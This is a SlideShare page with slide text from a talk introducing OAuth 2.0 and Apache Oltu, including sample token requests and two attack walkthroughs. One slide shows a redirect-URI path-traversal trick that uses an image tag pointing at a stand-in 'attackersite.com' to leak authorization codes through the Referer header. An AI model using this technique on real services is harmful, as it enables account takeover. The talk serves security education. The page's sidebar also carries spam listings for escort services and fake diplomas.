SlideShare ist ein Scribd-Unternehmen logo

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

Antonio Sanso
Antonio Sanso

JUG Basel

Internet
1 von 42
Downloaden Sie, um offline zu lesen
OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
My (little) contribution to OAuth Not an RFC, still in the draft phase
Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
A bit of history – OAuth 1.0a
A bit of history – OAuth 2.0 2 years X
The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
How difficult is to implement OAuth ? OAuth client OAuth server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
Bearer Token Authorization: Bearer 1017097752d5f18f716cc90ac8 a5e4c2a9ace6b9
Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
JSON Web Token eyJhbGciOiJIUzI1NiIs InR5cCI6IkpXVCJ9. eyJhdWQiOiJjb25uZ WN0MjAxNCIsImlzcy I6ImFzYW5zbyIsInN 1YiI6ImFzYW5zbyIsI mV4cCI6MTQwMzY wMTU1OSwiaWF0Ijo xNDAzNjAxNTU5fQ. MaGUiPg07ezuP9yA OaVLETQH6HMOpfo Gwg_c0-PDw {"alg":"HS256","typ":"JWT"} {"aud": "jug2015","iss":  "oltu","sub":"asanso","exp": 1403601559,"iat":1403601559} HMAC Header Claims Signature ★
JSON Web Token
OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/
Questions?

Empfohlen

Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015
Alvaro Sanchez-Mariscal
 
OAuth for your API - The Big Picture
OAuth for your API - The Big PictureOAuth for your API - The Big Picture
OAuth for your API - The Big Picture
Apigee | Google Cloud
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
robertjd
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
leahculver
 
OAuth using PHP5
OAuth using PHP5OAuth using PHP5
OAuth using PHP5
Nurulazrad Murad
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
Ismael Costa
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 

Empfohlen

Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015
Alvaro Sanchez-Mariscal
 
OAuth for your API - The Big Picture
OAuth for your API - The Big PictureOAuth for your API - The Big Picture
OAuth for your API - The Big Picture
Apigee | Google Cloud
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
robertjd
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuth
leahculver
 
OAuth using PHP5
OAuth using PHP5OAuth using PHP5
OAuth using PHP5
Nurulazrad Murad
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 Authentication
Ismael Costa
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
David Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
Lorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Uwe Friedrichsen
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
Matt Raible
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
Antonio Sanso
 

Weitere ähnliche Inhalte

Was ist angesagt?

Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
Alvaro Sanchez-Mariscal
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
Matt Raible
 

Was ist angesagt? (20)

Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
 

Andere mochten auch

How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
Antonio Sanso
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Hermann Burgmeier
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
Frank Kim
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and Authorization
ConFoo
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tears
Selene G. Parekh, MD, MBA
 
Amazon S3 Masterclass
Amazon S3 MasterclassAmazon S3 Masterclass
Amazon S3 Masterclass
Amazon Web Services
 

Andere mochten auch (20)

JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
 
Gramática - Termos Integrantes
Gramática - Termos IntegrantesGramática - Termos Integrantes
Gramática - Termos Integrantes
 
TDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com StreamTDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com Stream
 
Top X OAuth 2 Hacks
Top X OAuth 2 HacksTop X OAuth 2 Hacks
Top X OAuth 2 Hacks
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
 
Cqcon
CqconCqcon
Cqcon
 
OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and Authorization
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2
 
Speeding Up Innovation
Speeding Up InnovationSpeeding Up Innovation
Speeding Up Innovation
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tears
 
An Introduction to OAuth 2
An Introduction to OAuth 2An Introduction to OAuth 2
An Introduction to OAuth 2
 
Intro to Amazon S3
Intro to Amazon S3Intro to Amazon S3
Intro to Amazon S3
 
C# OOP Advanced Concepts
C# OOP Advanced ConceptsC# OOP Advanced Concepts
C# OOP Advanced Concepts
 
Amazon S3 Masterclass
Amazon S3 MasterclassAmazon S3 Masterclass
Amazon S3 Masterclass
 

Ähnlich wie OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve it
Bastian Hofmann
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
Vivastream
 
O auth how_to
O auth how_toO auth how_to
O auth how_to
vivaqa
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at Webvisions
Aaron Parecki
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security
Joel Lord
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
Adam Lewis
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
Aaron Parecki
 

Ähnlich wie OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu (20)

The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve it
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbed
 
OAuth con doorkeeper
OAuth con doorkeeperOAuth con doorkeeper
OAuth con doorkeeper
 
Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuth
 
Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityChrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
 
Some OAuth love
Some OAuth loveSome OAuth love
Some OAuth love
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
 
O auth how_to
O auth how_toO auth how_to
O auth how_to
 
OAuth
OAuthOAuth
OAuth
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at Webvisions
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
 

Kürzlich hochgeladen

Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Monica Sydney
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girls
Monica Sydney
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Priya Reddy
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
ydyuyu
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
ayvbos
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
ydyuyu
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Monica Sydney
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
gajnagarg
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
ayvbos
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
F
 

Kürzlich hochgeladen (20)

20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
 
